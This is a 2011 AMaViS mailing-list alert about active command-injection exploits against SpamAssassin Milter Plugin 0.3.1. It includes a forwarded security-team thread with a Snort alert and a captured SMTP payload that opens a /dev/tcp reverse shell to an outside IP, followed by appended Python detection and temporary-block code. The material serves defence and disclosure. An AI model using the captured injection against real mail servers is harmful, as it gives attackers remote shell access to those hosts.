heads up: in case you are using spamassassin milter:
active exploits going on.

<http://seclists.org/fulldisclosure/2010/Mar/140>
<http://www.securityfocus.com/bid/38578>

Vulnerable: SpamAssassin Milter Plugin 0.3.1

I don't see anything on bugtraq about a fix.

-------- Original Message --------
Subject: RE: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

The rule is only looking for this:

  content:"to|3A|"; depth:10; nocase; content:"+|3A|\"|7C|";

Personally, I would probably block it. Although, if we're not seeing this sort of thing pop up on customers' boxes, a manual block in scanner2 is sufficient for now, right? Either way, let me know and I'll block/unblock/leave alone.

--
John Meyer
Associate Security Engineer
SECNAP Network Security
Office: (561) 999-5000 x:1235
Direct: (561) 948-2264

From: Michael Scheidell
Sent: Thursday, February 10, 2011 12:25 PM
To: John Meyer
Cc: Jonathan Scheidell; Anthony Wetula
Subject: Re: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

is the snort rule specific enough that you can block the offending ip for 5 mins? (if it's a real smtp server, it will retry) and let legit email through.

On 2/10/11 12:12 PM, John Meyer wrote:

I don't like the looks of this. I blocked that IP with samtool.

Payload:

  rcpt to: root+:"|exec /bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0"
  data
  .
  quit

--
John Meyer
Associate Security Engineer
SECNAP Network Security
Office: (561) 999-5000 x:1235
Direct: (561) 948-2264

From: SECNAP Network Security
Sent: Thursday, February 10, 2011 12:01 PM
To: security-al...@scanner2.secnap.com
Subject: alert: New event: ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt

02/10-12:00:59 <trust1> TCP 62.206.228.188:56691 --> 10.70.1.33:25 [1:2010877:3] ET EXPLOIT Possible SpamAssassin Milter Plugin Remote Arbitrary Command Injection Attempt [Classification: Attempted User Privilege Gain] [Priority: 1]

--
Michael Scheidell, CTO
o: 561-999-5000
d: 561-948-2259
ISN: 1259*1300
SECNAP Network Security Corporation

_______________________________________________
AMaViS-user mailing list
AMaViS-user@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/amavis-user
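The two content matches John quotes from the Snort rule (SID 2010877), implemented as plain Python detection logic together with the 5-minute temporary source block Michael asks about, as an added example that is not part of this thread and not code from SECNAP or the Emerging Threats rule set. The IP addresses and SMTP command lines are constructed, and the flagged line carries a placeholder in the command position rather than the captured payload:

```python
"""Equivalent of the two content matches in Snort SID 2010877, plus a
5-minute temporary source block. Added example; not code from the thread."""
import time
from typing import Callable, Dict, List, Tuple

# Decoded from the rule text: |3A| is ':' and |7C| is '|'.
FIRST_CONTENT = b"to:"     # content:"to|3A|"; depth:10; nocase;
SECOND_CONTENT = b'+:"|'   # content:"+|3A|\"|7C|"; (absolute, case-sensitive)


def matches_rule(payload: bytes) -> bool:
    """Return True when the payload satisfies both content matches.

    depth:10 limits the first search to the first 10 bytes and nocase makes
    it case-insensitive. The second content has no relative modifier, so it
    is searched anywhere in the payload, case-sensitively.
    """
    if FIRST_CONTENT not in payload[:10].lower():
        return False
    return SECOND_CONTENT in payload


class TempBlocklist:
    """Source-IP block that lapses after ttl_seconds (default 5 minutes)."""

    def __init__(self, ttl_seconds: float = 300.0,
                 now: Callable[[], float] = time.time) -> None:
        self._ttl = ttl_seconds
        self._now = now            # injectable clock so expiry is testable
        self._expiry: Dict[str, float] = {}

    def block(self, ip: str) -> None:
        self._expiry[ip] = self._now() + self._ttl

    def is_blocked(self, ip: str) -> bool:
        expires_at = self._expiry.get(ip)
        if expires_at is None:
            return False
        if self._now() >= expires_at:
            del self._expiry[ip]   # block lapsed; a retrying MTA gets through
            return False
        return True


def inspect_smtp_command(src_ip: str, line: bytes,
                         blocklist: TempBlocklist) -> bool:
    """Run the rule over one SMTP command line; block the source on a hit."""
    hit = matches_rule(line)
    if hit:
        blocklist.block(src_ip)
    return hit


# Constructed sample SMTP command lines (not captured traffic). The flagged
# line carries a placeholder in the command position, not the thread's payload.
SAMPLE_COMMANDS: List[Tuple[str, bytes]] = [
    ("192.0.2.10", b"RCPT TO:<alice@example.org>\r\n"),
    ("192.0.2.10", b"RCPT TO:<bob+newsletter@example.org>\r\n"),   # plus-addressing, benign
    ("198.51.100.7", b'rcpt to: root+:"|PLACEHOLDER_COMMAND"\r\n'),  # satisfies both matches
    ("192.0.2.11", b'MAIL FROM:<x+:"|y@example.org>\r\n'),          # "to:" not within depth 10
]


def run_samples(blocklist: TempBlocklist) -> Dict[str, bool]:
    """Inspect every sample line and report which sources end up blocked."""
    for src_ip, line in SAMPLE_COMMANDS:
        inspect_smtp_command(src_ip, line, blocklist)
    return {ip: blocklist.is_blocked(ip) for ip, _ in SAMPLE_COMMANDS}


if __name__ == "__main__":
    for ip, blocked in run_samples(TempBlocklist()).items():
        print(f"{ip}: {'blocked' if blocked else 'allowed'}")
```

As the samples show, ordinary plus-addressing (`bob+newsletter@`) does not trip the rule, because the second match needs the literal `+:"|` sequence, and a `MAIL FROM` line never satisfies `depth:10` for `to:`. The block expires on its own, which is what lets a legitimate sending MTA that retries after the timeout deliver normally.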